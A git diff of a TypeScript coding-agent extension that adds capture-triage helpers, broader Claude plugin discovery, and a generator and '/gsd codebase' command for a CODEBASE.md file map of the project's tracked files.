+      (c.classification === "stop" || c.classification === "backtrack"),
+  );
+}
+
+/**
+ * Load unexecuted backtrack captures specifically — captures directing
+ * auto-mode to abandon current milestone and return to a previous one.
+ */
+export function loadBacktrackCaptures(basePath: string): CaptureEntry[] {
+  return loadAllCaptures(basePath).filter(
+    c => c.status === "resolved" && !c.executed && c.classification === "backtrack",
+  );
+}
+
+/**
+ * Revert captures that were silenced by non-triage agents.
+ *
+ * When an execute-task or other non-triage agent writes `**Status:** resolved`
+ * to CAPTURES.md, it bypasses the triage pipeline entirely. This function
+ * detects such captures (resolved but missing the Classification field that
+ * triage always writes) and reverts them to pending so the triage sidecar
+ * picks them up properly.
+ *
+ * Returns the number of captures reverted.
+ */
+export function revertExecutorResolvedCaptures(basePath: string): number {
+  const filePath = resolveCapturesPath(basePath);
+  if (!existsSync(filePath)) return 0;
+
+  let content = readFileSync(filePath, "utf-8");
+  let reverted = 0;
+
+  const all = loadAllCaptures(basePath);
+  for (const capture of all) {
+    // A properly triaged capture has both resolved status AND a classification.
+    // An executor-silenced capture has resolved status but NO classification.
+    if (capture.status === "resolved" && !capture.classification) {
+      const sectionRegex = new RegExp(
+        `(### ${escapeRegex(capture.id)}\\n(?:(?!### ).)*?)(?=### |$)`,
+        "s",
+      );
+      const match = sectionRegex.exec(content);
+      if (match) {
+        let section = match[1];
+        section = section.replace(
+          /\*\*Status:\*\*\s*resolved/i,
+          "**Status:** pending",
+        );
+        content = content.replace(sectionRegex, section);
+        reverted++;
+      }
+    }
+  }
+
+  if (reverted > 0) {
+    writeFileSync(filePath, content, "utf-8");
+  }
+
+  return reverted;
+}
+
+/**
+ * Retroactively stamp a capture with a milestone ID.
+ *
+ * Used by executeTriageResolutions() as a safety net when the triage LLM
+ * resolves a capture without writing the **Milestone:** field.  This ensures
+ * the staleness gate in loadActionableCaptures() works correctly even for
+ * captures resolved before the prompt was updated (#2872).
+ */
+export function stampCaptureMilestone(basePath: string, captureId: string, milestoneId: string): void {
+  const filePath = resolveCapturesPath(basePath);
+  if (!existsSync(filePath)) return;
+
+  const content = readFileSync(filePath, "utf-8");
+
+  const sectionRegex = new RegExp(
+    `(### ${escapeRegex(captureId)}\\n(?:(?!### ).)*?)(?=### |$)`,
+    "s",
+  );
+  const match = sectionRegex.exec(content);
+  if (!match) return;
+
+  let section = match[1];
+
+  // Only stamp if not already present
+  if (/\*\*Milestone:\*\*/.test(section)) return;
+
+  // Insert after the Resolved field (or at end of section)
+  const resolvedFieldEnd = section.search(/\*\*Resolved:\*\*\s*.+\n?/);
+  if (resolvedFieldEnd !== -1) {
+    const resolvedMatch = section.match(/\*\*Resolved:\*\*\s*.+\n?/);
+    const insertPos = resolvedFieldEnd + (resolvedMatch?.[0]?.length ?? 0);
+    section = section.slice(0, insertPos) + `**Milestone:** ${milestoneId}\n` + section.slice(insertPos);
+  } else {
+    section = section.trimEnd() + "\n" + `**Milestone:** ${milestoneId}` + "\n";
+  }
+
+  const updated = content.replace(sectionRegex, section);
+  writeFileSync(filePath, updated, "utf-8");
+}
+
 // ─── Parser ───────────────────────────────────────────────────────────────────
 
 /**
@@ -291,6 +418,7 @@ function parseCapturesContent(content: string): CaptureEntry[] {
     const resolution = extractBoldField(body, "Resolution");
     const rationale = extractBoldField(body, "Rationale");
     const resolvedAt = extractBoldField(body, "Resolved");
+    const milestoneId = extractBoldField(body, "Milestone");
     const executedAt = extractBoldField(body, "Executed");
 
     if (!text || !timestamp) continue;
@@ -308,6 +436,7 @@ function parseCapturesContent(content: string): CaptureEntry[] {
       ...(resolution ? { resolution } : {}),
       ...(rationale ? { rationale } : {}),
       ...(resolvedAt ? { resolvedAt } : {}),
+      ...(milestoneId ? { resolvedInMilestone: milestoneId } : {}),
       ...(executedAt ? { executed: true } : {}),
     });
   }
diff --git a/src/resources/extensions/gsd/claude-import.ts b/src/resources/extensions/gsd/claude-import.ts
index fd17bb57a..ca34d27ed 100644
--- a/src/resources/extensions/gsd/claude-import.ts
+++ b/src/resources/extensions/gsd/claude-import.ts
@@ -103,16 +103,47 @@ function isMarketplacePath(pluginPath: string): boolean {
 
 /**
  * Detect which plugin roots are marketplaces and which are legacy flat paths.
+ *
+ * Claude Code stores marketplace sources under ~/.claude/plugins/marketplaces/.
+ * Each subdirectory (e.g. marketplaces/confluent/) is a marketplace repo that
+ * contains .claude-plugin/marketplace.json. The parent directory itself does not
+ * have a marketplace.json, so we scan one level deeper when the root isn't
+ * directly a marketplace.
  */
-function categorizePluginRoots(pluginRoots: string[]): { marketplaces: string[]; flat: string[] } {
+export function categorizePluginRoots(pluginRoots: string[]): { marketplaces: string[]; flat: string[] } {
   const marketplaces: string[] = [];
   const flat: string[] = [];
+  const seen = new Set<string>();
 
   for (const root of pluginRoots) {
     if (isMarketplacePath(root)) {
-      marketplaces.push(root);
+      if (!seen.has(root)) {
+        marketplaces.push(root);
+        seen.add(root);
+      }
     } else {
-      flat.push(root);
+      // The root itself isn't a marketplace — check if it's a container of
+      // marketplaces (e.g. ~/.claude/plugins/marketplaces/ contains subdirs
+      // like confluent/, claude-hud/, each with their own marketplace.json).
+      let foundChild = false;
+      try {
+        const entries = readdirSync(root, { withFileTypes: true });
+        for (const entry of entries) {
+          if (!entry.isDirectory()) continue;
+          if (SKIP_DIRS.has(entry.name)) continue;
+          const childPath = join(root, entry.name);
+          if (isMarketplacePath(childPath) && !seen.has(childPath)) {
+            marketplaces.push(childPath);
+            seen.add(childPath);
+            foundChild = true;
+          }
+        }
+      } catch {
+        // Can't read directory — fall through to flat
+      }
+      if (!foundChild) {
+        flat.push(root);
+      }
     }
   }
 
@@ -170,18 +201,36 @@ export function discoverClaudePlugins(cwd: string): ClaudePluginCandidate[] {
 
   for (const root of pluginRoots) {
     walkDirs(root, (dir) => {
+      // Recognize both npm-style plugins (package.json) and Claude Code plugins
+      // (.claude-plugin/plugin.json). Claude marketplace-installed plugins use
+      // the latter format exclusively.
       const pkgPath = join(dir, "package.json");
-      if (!existsSync(pkgPath)) return;
+      const claudePluginPath = join(dir, ".claude-plugin", "plugin.json");
+      const hasPkg = existsSync(pkgPath);
+      const hasClaudePlugin = existsSync(claudePluginPath);
+      if (!hasPkg && !hasClaudePlugin) return;
+
       const resolvedDir = resolve(dir);
       if (seen.has(resolvedDir)) return;
       seen.add(resolvedDir);
+
       let packageName: string | undefined;
-      try {
-        const pkg = JSON.parse(readFileSync(pkgPath, "utf8")) as { name?: string };
-        packageName = pkg.name;
-      } catch {
-        packageName = undefined;
+      if (hasPkg) {
+        try {
+          const pkg = JSON.parse(readFileSync(pkgPath, "utf8")) as { name?: string };
+          packageName = pkg.name;
+        } catch {
+          packageName = undefined;
+        }
+      } else if (hasClaudePlugin) {
+        try {
+          const manifest = JSON.parse(readFileSync(claudePluginPath, "utf8")) as { name?: string };
+          packageName = manifest.name;
+        } catch {
+          packageName = undefined;
+        }
       }
+
       results.push({
         type: "plugin",
         name: packageName || basename(dir),
diff --git a/src/resources/extensions/gsd/codebase-generator.ts b/src/resources/extensions/gsd/codebase-generator.ts
new file mode 100644
index 000000000..f56d84079
--- /dev/null
+++ b/src/resources/extensions/gsd/codebase-generator.ts
@@ -0,0 +1,600 @@
+/**
+ * GSD Codebase Map Generator
+ *
+ * Produces .gsd/CODEBASE.md — a structural table of contents for the project.
+ * Gives fresh agent contexts instant orientation without filesystem exploration.
+ *
+ * Generation: walk `git ls-files`, group by directory, output with descriptions.
+ * Maintenance: agent updates descriptions as it works; incremental update preserves them.
+ */
+
+import { createHash } from "node:crypto";
+import { existsSync, readFileSync, writeFileSync, mkdirSync } from "node:fs";
+import { join, dirname, extname } from "node:path";
+
+import { execSync } from "node:child_process";
+import { gsdRoot } from "./paths.js";
+
+// ─── Types ───────────────────────────────────────────────────────────────────
+
+export interface CodebaseMapOptions {
+  excludePatterns?: string[];
+  maxFiles?: number;
+  collapseThreshold?: number;
+}
+
+export interface CodebaseMapMetadata {
+  generatedAt: string;
+  fingerprint: string;
+  fileCount: number;
+  truncated: boolean;
+}
+
+export interface EnsureCodebaseMapOptions {
+  ttlMs?: number;
+  maxAgeMs?: number;
+  force?: boolean;
+}
+
+export interface EnsureCodebaseMapResult {
+  status: "generated" | "updated" | "fresh" | "empty";
+  fileCount: number;
+  truncated: boolean;
+  generatedAt: string | null;
+  fingerprint: string | null;
+  reason?: string;
+}
+
+interface FileEntry {
+  path: string;
+  description: string;
+}
+
+interface DirectoryGroup {
+  path: string;
+  files: FileEntry[];
+  collapsed: boolean;
+}
+
+interface ResolvedCodebaseMapOptions {
+  excludes: string[];
+  maxFiles: number;
+  collapseThreshold: number;
+  optionSignature: string;
+}
+
+interface EnumeratedFiles {
+  files: string[];
+  truncated: boolean;
+}
+
+// ─── Defaults ────────────────────────────────────────────────────────────────
+
+const DEFAULT_EXCLUDES = [
+  ".gsd/",
+  ".planning/",
+  ".plans/",
+  ".claude/",
+  ".cursor/",
+  ".vscode/",
+  ".git/",
+  "node_modules/",
+  "dist/",
+  "build/",
+  ".next/",
+  "coverage/",
+  "__pycache__/",
+  ".venv/",
+  "vendor/",
+];
+
+const DEFAULT_MAX_FILES = 500;
+const DEFAULT_COLLAPSE_THRESHOLD = 20;
+const DEFAULT_REFRESH_TTL_MS = 30_000;
+const DEFAULT_MAX_AGE_MS = 15 * 60_000;
+const CODEBASE_METADATA_PREFIX = "<!-- gsd:codebase-meta ";
+
+const freshnessCache = new Map<string, { checkedAt: number; result: EnsureCodebaseMapResult }>();
+
+// ─── Parsing ─────────────────────────────────────────────────────────────────
+
+/**
+ * Parse an existing CODEBASE.md to extract file → description mappings.
+ * Also scans <!-- gsd:collapsed-descriptions --> comment blocks to preserve
+ * descriptions for files in collapsed directories across incremental updates.
+ */
+export function parseCodebaseMap(content: string): Map<string, string> {
+  const descriptions = new Map<string, string>();
+  let inCollapsedBlock = false;
+
+  for (const line of content.split("\n")) {
+    // Track collapsed-description comment blocks
+    if (line.trimStart().startsWith("<!-- gsd:collapsed-descriptions")) {
+      inCollapsedBlock = true;
+      continue;
+    }
+    if (inCollapsedBlock && line.trimStart().startsWith("-->")) {
+      inCollapsedBlock = false;
+      continue;
+    }
+
+    // Match: - `path/to/file.ts` — Description here
+    const match = line.match(/^- `(.+?)` — (.+)$/);
+    if (match) {
+      descriptions.set(match[1], match[2]);
+      continue;
+    }
+
+    // Match: - `path/to/file.ts` (no description) — only outside collapsed blocks
+    if (!inCollapsedBlock) {
+      const bareMatch = line.match(/^- `(.+?)`\s*$/);
+      if (bareMatch) {
+        descriptions.set(bareMatch[1], "");
+      }
+    }
+  }
+  return descriptions;
+}
+
+export function parseCodebaseMapMetadata(content: string): CodebaseMapMetadata | null {
+  const metaLine = content
+    .split("\n")
+    .find((line) => line.trimStart().startsWith(CODEBASE_METADATA_PREFIX));
+  if (!metaLine) return null;
+
+  const trimmed = metaLine.trim();
+  const jsonStart = CODEBASE_METADATA_PREFIX.length;
+  const jsonEnd = trimmed.lastIndexOf(" -->");
+  if (jsonEnd <= jsonStart) return null;
+
+  try {
+    const parsed = JSON.parse(trimmed.slice(jsonStart, jsonEnd));
+    if (
+      typeof parsed?.generatedAt === "string"
+      && typeof parsed?.fingerprint === "string"
+      && typeof parsed?.fileCount === "number"
+      && typeof parsed?.truncated === "boolean"
+    ) {
+      return parsed as CodebaseMapMetadata;
+    }
+  } catch {
+    // Ignore malformed metadata and treat the map as stale.
+  }
+  return null;
+}
+
+// ─── File Enumeration ────────────────────────────────────────────────────────
+
+function shouldExclude(filePath: string, excludes: string[]): boolean {
+  for (const pattern of excludes) {
+    if (pattern.endsWith("/")) {
+      if (filePath.startsWith(pattern) || filePath.includes(`/${pattern}`)) return true;
+    } else if (filePath === pattern || filePath.endsWith(`/${pattern}`)) {
+      return true;
+    }
+  }
+  // Skip binary/lock files
+  const ext = extname(filePath).toLowerCase();
+  if ([".lock", ".png", ".jpg", ".jpeg", ".gif", ".ico", ".woff", ".woff2", ".ttf", ".eot", ".svg"].includes(ext)) {
+    return true;
+  }
+  return false;
+}
+
+function lsFiles(basePath: string): string[] {
+  try {
+    const result = execSync("git ls-files", { cwd: basePath, encoding: "utf-8", timeout: 10000 });
+    return result.split("\n").filter(Boolean);
+  } catch {
+    return [];
+  }
+}
+
+/**
+ * Enumerate tracked files, applying exclusions and the maxFiles cap.
+ * Returns both the file list and whether truncation occurred.
+ */
+function enumerateFiles(basePath: string, excludes: string[], maxFiles: number): { files: string[]; truncated: boolean } {
+  const allFiles = lsFiles(basePath);
+  const filtered = allFiles.filter((f) => !shouldExclude(f, excludes));
+  const truncated = filtered.length > maxFiles;
+  return { files: truncated ? filtered.slice(0, maxFiles) : filtered, truncated };
+}
+
+function resolveGeneratorOptions(options?: CodebaseMapOptions): ResolvedCodebaseMapOptions {
+  const excludes = [...DEFAULT_EXCLUDES, ...(options?.excludePatterns ?? [])];
+  const maxFiles = options?.maxFiles ?? DEFAULT_MAX_FILES;
+  const collapseThreshold = options?.collapseThreshold ?? DEFAULT_COLLAPSE_THRESHOLD;
+  return {
+    excludes,
+    maxFiles,
+    collapseThreshold,
+    optionSignature: JSON.stringify({
+      excludes,
+      maxFiles,
+      collapseThreshold,
+    }),
+  };
+}
+
+function computeCodebaseFingerprint(
+  files: string[],
+  resolved: ResolvedCodebaseMapOptions,
+  truncated: boolean,
+): string {
+  return createHash("sha1")
+    .update(JSON.stringify({
+      files,
+      truncated,
+      optionSignature: resolved.optionSignature,
+    }))
+    .digest("hex");
+}
+
+// ─── Grouping ────────────────────────────────────────────────────────────────
+
+function groupByDirectory(
+  files: string[],
+  descriptions: Map<string, string>,
+  collapseThreshold: number,
+): DirectoryGroup[] {
+  const dirMap = new Map<string, FileEntry[]>();
+
+  for (const file of files) {
+    const dir = dirname(file);
+    const dirKey = dir === "." ? "" : dir;
+    if (!dirMap.has(dirKey)) {
+      dirMap.set(dirKey, []);
+    }
+    dirMap.get(dirKey)!.push({
+      path: file,
+      description: descriptions.get(file) ?? "",
+    });
+  }
+
+  const groups: DirectoryGroup[] = [];
+  const sortedDirs = [...dirMap.keys()].sort();
+
+  for (const dir of sortedDirs) {
+    const dirFiles = dirMap.get(dir)!;
+    dirFiles.sort((a, b) => a.path.localeCompare(b.path));
+
+    groups.push({
+      path: dir,
+      files: dirFiles,
+      collapsed: dirFiles.length > collapseThreshold,
+    });
+  }
+
+  return groups;
+}
+
+// ─── Rendering ───────────────────────────────────────────────────────────────
+
+function renderCodebaseMap(
+  groups: DirectoryGroup[],
+  totalFiles: number,
+  truncated: boolean,
+  metadata: CodebaseMapMetadata,
+): string {
+  const lines: string[] = [];
+  const described = groups.reduce((sum, g) => sum + g.files.filter((f) => f.description).length, 0);
+
+  lines.push("# Codebase Map");
+  lines.push("");
+  lines.push(`Generated: ${metadata.generatedAt} | Files: ${totalFiles} | Described: ${described}/${totalFiles}`);
+  lines.push(`${CODEBASE_METADATA_PREFIX}${JSON.stringify(metadata)} -->`);
+  if (truncated) {
+    lines.push(`Note: Truncated to first ${totalFiles} files. Run with higher --max-files to include all.`);
+  }
+  lines.push("");
+
+  for (const group of groups) {
+    const heading = group.path || "(root)";
+    lines.push(`### ${heading}/`);
+
+    if (group.collapsed) {
+      // Summarize collapsed directories
+      const extensions = new Map<string, number>();
+      for (const f of group.files) {
+        const ext = extname(f.path) || "(no ext)";
+        extensions.set(ext, (extensions.get(ext) ?? 0) + 1);
+      }
+      const extSummary = [...extensions.entries()]
+        .sort((a, b) => b[1] - a[1])
+        .map(([ext, count]) => `${count} ${ext}`)
+        .join(", ");
+      lines.push(`- *(${group.files.length} files: ${extSummary})*`);
+
+      // Preserve any existing descriptions in a hidden comment block so
+      // incremental updates can recover them via parseCodebaseMap.
+      const descLines = group.files
+        .filter((f) => f.description)
+        .map((f) => `- \`${f.path}\` — ${f.description}`);
+      if (descLines.length > 0) {
+        lines.push("<!-- gsd:collapsed-descriptions");
+        lines.push(...descLines);
+        lines.push("-->");
+      }
+    } else {
+      for (const file of group.files) {
+        if (file.description) {
+          lines.push(`- \`${file.path}\` — ${file.description}`);
+        } else {
+          lines.push(`- \`${file.path}\``);
+        }
+      }
+    }
+    lines.push("");
+  }
+
+  return lines.join("\n");
+}
+
+function buildCodebaseMap(
+  basePath: string,
+  resolved: ResolvedCodebaseMapOptions,
+  existingDescriptions?: Map<string, string>,
+  enumerated?: EnumeratedFiles,
+): {
+  content: string;
+  fileCount: number;
+  truncated: boolean;
+  files: string[];
+  fingerprint: string;
+  generatedAt: string;
+} {
+  const listed = enumerated ?? enumerateFiles(basePath, resolved.excludes, resolved.maxFiles);
+  const descriptions = existingDescriptions ?? new Map<string, string>();
+  const groups = groupByDirectory(listed.files, descriptions, resolved.collapseThreshold);
+  const generatedAt = new Date().toISOString().split(".")[0] + "Z";
+  const metadata: CodebaseMapMetadata = {
+    generatedAt,
+    fingerprint: computeCodebaseFingerprint(listed.files, resolved, listed.truncated),
+    fileCount: listed.files.length,
+    truncated: listed.truncated,
+  };
+  const content = renderCodebaseMap(groups, listed.files.length, listed.truncated, metadata);
+
+  return {
+    content,
+    fileCount: listed.files.length,
+    truncated: listed.truncated,
+    files: listed.files,
+    fingerprint: metadata.fingerprint,
+    generatedAt,
+  };
+}
+
+// ─── Public API ──────────────────────────────────────────────────────────────
+
+/**
+ * Generate a fresh CODEBASE.md from scratch.
+ * Preserves existing descriptions if `existingDescriptions` is provided.
+ */
+export function generateCodebaseMap(
+  basePath: string,
+  options?: CodebaseMapOptions,
+  existingDescriptions?: Map<string, string>,
+): { content: string; fileCount: number; truncated: boolean; files: string[]; fingerprint: string; generatedAt: string } {
+  const resolved = resolveGeneratorOptions(options);
+  return buildCodebaseMap(basePath, resolved, existingDescriptions);
+}
+
+/**
+ * Incremental update: re-scan files, preserve existing descriptions,
+ * add new files, remove deleted files.
+ */
+export function updateCodebaseMap(
+  basePath: string,
+  options?: CodebaseMapOptions,
+): {
+  content: string;
+  added: number;
+  removed: number;
+  unchanged: number;
+  fileCount: number;
+  truncated: boolean;
+  fingerprint: string;
+  generatedAt: string;
+} {
+  const codebasePath = join(gsdRoot(basePath), "CODEBASE.md");
+  const resolved = resolveGeneratorOptions(options);
+
+  // Load existing descriptions
+  let existingDescriptions = new Map<string, string>();
+  if (existsSync(codebasePath)) {
+    const existing = readFileSync(codebasePath, "utf-8");
+    existingDescriptions = parseCodebaseMap(existing);
+  }
+
+  const existingFiles = new Set(existingDescriptions.keys());
+
+  // Generate new map preserving descriptions — reuse the returned file list
+  // to avoid a second enumeration (prevents race between content and stats).
+  const result = buildCodebaseMap(basePath, resolved, existingDescriptions);
+  const currentSet = new Set(result.files);
+
+  // Count changes
+  let added = 0;
+  let removed = 0;
+
+  for (const f of result.files) {
+    if (!existingFiles.has(f)) added++;
+  }
+  for (const f of existingFiles) {
+    if (!currentSet.has(f)) removed++;
+  }
+
+  return {
+    content: result.content,
+    added,
+    removed,
+    unchanged: result.files.length - added,
+    fileCount: result.fileCount,
+    truncated: result.truncated,
+    fingerprint: result.fingerprint,
+    generatedAt: result.generatedAt,
+  };
+}
+
+function clearFreshnessCache(basePath: string): void {
+  for (const key of freshnessCache.keys()) {
+    if (key === basePath || key.startsWith(`${basePath}::`)) {
+      freshnessCache.delete(key);
+    }
+  }
+}
+
+export function ensureCodebaseMapFresh(
+  basePath: string,
+  options?: CodebaseMapOptions,
+  ensureOptions?: EnsureCodebaseMapOptions,
+): EnsureCodebaseMapResult {
+  const resolved = resolveGeneratorOptions(options);
+  const cacheKey = `${basePath}::${resolved.optionSignature}`;
+  const ttlMs = ensureOptions?.ttlMs ?? DEFAULT_REFRESH_TTL_MS;
+  const maxAgeMs = ensureOptions?.maxAgeMs ?? DEFAULT_MAX_AGE_MS;
+  const force = ensureOptions?.force === true;
+  const now = Date.now();
+
+  if (!force && ttlMs > 0) {
+    const cached = freshnessCache.get(cacheKey);
+    if (cached && now - cached.checkedAt < ttlMs) {
+      return cached.result;
+    }
+  }
+
+  const existing = readCodebaseMap(basePath);
+  const listed = enumerateFiles(basePath, resolved.excludes, resolved.maxFiles);
+  const fingerprint = computeCodebaseFingerprint(listed.files, resolved, listed.truncated);
+
+  const cacheAndReturn = (result: EnsureCodebaseMapResult): EnsureCodebaseMapResult => {
+    freshnessCache.set(cacheKey, { checkedAt: now, result });
+    return result;
+  };
+
+  if (!existing) {
+    const generated = buildCodebaseMap(basePath, resolved, undefined, listed);
+    if (generated.fileCount > 0) {
+      writeCodebaseMap(basePath, generated.content);
+      return cacheAndReturn({
+        status: "generated",
+        fileCount: generated.fileCount,
+        truncated: generated.truncated,
+        generatedAt: generated.generatedAt,
+        fingerprint: generated.fingerprint,
+        reason: "missing",
+      });
+    }
+    return cacheAndReturn({
+      status: "empty",
+      fileCount: 0,
+      truncated: false,
+      generatedAt: null,
+      fingerprint,
+      reason: "no-tracked-files",
+    });
+  }
+
+  const metadata = parseCodebaseMapMetadata(existing);
+  const existingDescriptions = parseCodebaseMap(existing);
+  const ageMs = metadata ? now - Date.parse(metadata.generatedAt) : Number.POSITIVE_INFINITY;
+  const staleReason =
+    !metadata ? "missing-metadata"
+    : metadata.fingerprint !== fingerprint ? "files-changed"
+    : metadata.fileCount !== listed.files.length ? "file-count-changed"
+    : metadata.truncated !== listed.truncated ? "truncation-changed"
+    : maxAgeMs > 0 && Number.isFinite(ageMs) && ageMs > maxAgeMs ? "expired"
+    : undefined;
+
+  if (!staleReason) {
+    return cacheAndReturn({
+      status: "fresh",
+      fileCount: metadata?.fileCount ?? listed.files.length,
+      truncated: metadata?.truncated ?? listed.truncated,
+      generatedAt: metadata?.generatedAt ?? null,
+      fingerprint: metadata?.fingerprint ?? fingerprint,
+    });
+  }
+
+  const updated = buildCodebaseMap(basePath, resolved, existingDescriptions, listed);
+  if (updated.fileCount > 0) {
+    writeCodebaseMap(basePath, updated.content);
+    return cacheAndReturn({
+      status: "updated",
+      fileCount: updated.fileCount,
+      truncated: updated.truncated,
+      generatedAt: updated.generatedAt,
+      fingerprint: updated.fingerprint,
+      reason: staleReason,
+    });
+  }
+
+  return cacheAndReturn({
+    status: "empty",
+    fileCount: 0,
+    truncated: false,
+    generatedAt: null,
+    fingerprint,
+    reason: staleReason,
+  });
+}
+
+/**
+ * Write CODEBASE.md to .gsd/ directory.
+ */
+export function writeCodebaseMap(basePath: string, content: string): string {
+  const root = gsdRoot(basePath);
+  mkdirSync(root, { recursive: true });
+  const outPath = join(root, "CODEBASE.md");
+  writeFileSync(outPath, content, "utf-8");
+  clearFreshnessCache(basePath);
+  return outPath;
+}
+
+/**
+ * Read existing CODEBASE.md, or return null if it doesn't exist.
+ */
+export function readCodebaseMap(basePath: string): string | null {
+  const codebasePath = join(gsdRoot(basePath), "CODEBASE.md");
+  if (!existsSync(codebasePath)) return null;
+  try {
+    return readFileSync(codebasePath, "utf-8");
+  } catch {
+    return null;
+  }
+}
+
+/**
+ * Get stats about the codebase map.
+ */
+export function getCodebaseMapStats(basePath: string): {
+  exists: boolean;
+  fileCount: number;
+  describedCount: number;
+  undescribedCount: number;
+  generatedAt: string | null;
+} {
+  const content = readCodebaseMap(basePath);
+  if (!content) {
+    return { exists: false, fileCount: 0, describedCount: 0, undescribedCount: 0, generatedAt: null };
+  }
+
+  // Parse total file count from the header line (accurate even for collapsed dirs)
+  const fileCountMatch = content.match(/Files:\s*(\d+)/);
+  const totalFiles = fileCountMatch ? parseInt(fileCountMatch[1], 10) : 0;
+
+  // Use parseCodebaseMap to count described files (includes collapsed-description blocks)
+  const descriptions = parseCodebaseMap(content);
+  const described = [...descriptions.values()].filter((d) => d.length > 0).length;
+  const dateMatch = content.match(/Generated: (\S+)/);
+
+  return {
+    exists: true,
+    fileCount: totalFiles,
+    describedCount: described,
+    undescribedCount: totalFiles - described,
+    generatedAt: dateMatch?.[1] ?? null,
+  };
+}
diff --git a/src/resources/extensions/gsd/commands-bootstrap.ts b/src/resources/extensions/gsd/commands-bootstrap.ts
index 9a973c2d9..0f5c55cd1 100644
--- a/src/resources/extensions/gsd/commands-bootstrap.ts
+++ b/src/resources/extensions/gsd/commands-bootstrap.ts
@@ -45,6 +45,7 @@ const TOP_LEVEL_SUBCOMMANDS = [
   { cmd: "start", desc: "Start a workflow template" },
   { cmd: "templates", desc: "List available workflow templates" },
   { cmd: "extensions", desc: "Manage extensions" },
+  { cmd: "codebase", desc: "Generate, refresh, and inspect the codebase map cache" },
 ] as const;
 
 function filterStartsWith(
@@ -218,6 +219,15 @@ function getGsdArgumentCompletions(prefix: string) {
     ], "extensions");
   }
 
+  if (parts[0] === "codebase" && parts.length <= 2) {
+    return filterStartsWith(partial, [
+      { cmd: "generate", desc: "Generate or regenerate CODEBASE.md" },
+      { cmd: "update", desc: "Refresh the CODEBASE.md cache immediately" },
+      { cmd: "stats", desc: "Show codebase-map coverage and generation time" },
+      { cmd: "help", desc: "Show usage and subcommands" },
+    ], "codebase");
+  }
+
   if (parts[0] === "doctor" && parts.length <= 2) {
     return filterStartsWith(partial, [
       { cmd: "fix", desc: "Auto-fix detected issues" },
diff --git a/src/resources/extensions/gsd/commands-codebase.ts b/src/resources/extensions/gsd/commands-codebase.ts
new file mode 100644
index 000000000..20967e03f
--- /dev/null
+++ b/src/resources/extensions/gsd/commands-codebase.ts
@@ -0,0 +1,197 @@
+/**
+ * GSD Command — /gsd codebase
+ *
+ * Generate and manage the codebase map (.gsd/CODEBASE.md).
+ * Subcommands: generate, update, stats, help
+ */
+
+import type { ExtensionAPI, ExtensionCommandContext } from "@gsd/pi-coding-agent";
+
+import {
+  generateCodebaseMap,
+  updateCodebaseMap,
+  writeCodebaseMap,
+  getCodebaseMapStats,
+  readCodebaseMap,
+} from "./codebase-generator.js";
+import { loadEffectiveGSDPreferences } from "./preferences.js";
+import type { CodebaseMapOptions } from "./codebase-generator.js";
+
+const USAGE =
+  "Usage: /gsd codebase [generate|update|stats]\n\n" +
+  "  generate [--max-files N] [--collapse-threshold N]  — Generate or regenerate CODEBASE.md\n" +
+  "  update [--max-files N] [--collapse-threshold N]    — Refresh the CODEBASE.md cache immediately\n" +
+  "  stats                                              — Show file count, coverage, and generation time\n" +
+  "  help                                               — Show this help\n\n" +
+  "With no subcommand, shows stats if a map exists or help if not.\n" +
+  "GSD also refreshes CODEBASE.md automatically before prompt injection and after completed units when tracked files change.\n\n" +
+  "Configure defaults via preferences.md:\n" +
+  "  codebase:\n" +
+  "    exclude_patterns: [\"docs/\", \"fixtures/\"]\n" +
+  "    max_files: 1000\n" +
+  "    collapse_threshold: 15";
+
+export async function handleCodebase(
+  args: string,
+  ctx: ExtensionCommandContext,
+  _pi: ExtensionAPI,
+): Promise<void> {
+  const basePath = process.cwd();
+  const parts = args.trim().split(/\s+/);
+  const sub = parts[0] ?? "";
+
+  switch (sub) {
+    case "generate": {
+      const options = resolveCodebaseOptions(args, ctx);
+      if (options === false) return; // validation failed, message already shown
+
+      const existing = readCodebaseMap(basePath);
+      const existingDescriptions = existing
+        ? (await import("./codebase-generator.js")).parseCodebaseMap(existing)
+        : undefined;
+
+      const result = generateCodebaseMap(basePath, options, existingDescriptions);
+
+      if (result.fileCount === 0) {
+        ctx.ui.notify(
+          "Codebase map generated with 0 files.\n" +
+          "Is this a git repository? Run 'git ls-files' to verify.",
+          "warning",
+        );
+        return;
+      }
+
+      const outPath = writeCodebaseMap(basePath, result.content);
+      ctx.ui.notify(
+        `Codebase map generated: ${result.fileCount} files\n` +
+        `Written to: ${outPath}` +
+        (result.truncated ? `\n⚠ Truncated — increase --max-files to include all files` : ""),
+        "success",
+      );
+      return;
+    }
+
+    case "update": {
+      const existing = readCodebaseMap(basePath);
+      if (!existing) {
+        ctx.ui.notify(
+          "No codebase map found. Run /gsd codebase generate to create one.",
+          "warning",
+        );
+        return;
+      }
+
+      const options = resolveCodebaseOptions(args, ctx);
+      if (options === false) return;
+
+      const result = updateCodebaseMap(basePath, options);
+      writeCodebaseMap(basePath, result.content);
+
+      ctx.ui.notify(
+        `Codebase map updated: ${result.fileCount} files\n` +
+        `  Added: ${result.added} | Removed: ${result.removed} | Unchanged: ${result.unchanged}` +
+        (result.truncated ? `\n⚠ Truncated — increase --max-files to include all files` : ""),
+        "success",
+      );
+      return;
+    }
+
+    case "stats": {
+      showStats(basePath, ctx);
+      return;
+    }
+
+    case "help":
+      ctx.ui.notify(USAGE, "info");
+      return;
+
+    case "": {
+      // Safe default: show stats if map exists, help if not
+      const existing = readCodebaseMap(basePath);
+      if (existing) {
+        showStats(basePath, ctx);
+      } else {
+        ctx.ui.notify(USAGE, "info");
+      }
+      return;
+    }
+
+    default:
+      ctx.ui.notify(
+        `Unknown subcommand "${sub}".\n\n${USAGE}`,
+        "warning",
+      );
+  }
+}
+
+function showStats(basePath: string, ctx: ExtensionCommandContext): void {
+  const stats = getCodebaseMapStats(basePath);
+  if (!stats.exists) {
+    ctx.ui.notify("No codebase map found. Run /gsd codebase generate to create one.", "info");
+    return;
+  }
+
+  const coverage = stats.fileCount > 0
+    ? Math.round((stats.describedCount / stats.fileCount) * 100)
+    : 0;
+
+  ctx.ui.notify(
+    `Codebase Map Stats:\n` +
+    `  Files: ${stats.fileCount}\n` +
+    `  Described: ${stats.describedCount} (${coverage}%)\n` +
+    `  Undescribed: ${stats.undescribedCount}\n` +
+    `  Generated: ${stats.generatedAt ?? "unknown"}\n\n` +
+    (stats.undescribedCount > 0
+      ? `Tip: Auto-refresh keeps the cache current, but /gsd codebase update forces an immediate refresh.`
+      : `Coverage is complete.`),
+    "info",
+  );
+}
+
+/**
+ * Resolve codebase map options by merging preferences with CLI flags.
+ * CLI flags override preferences; preferences override built-in defaults.
+ * Returns false if validation failed (error already shown to user).
+ */
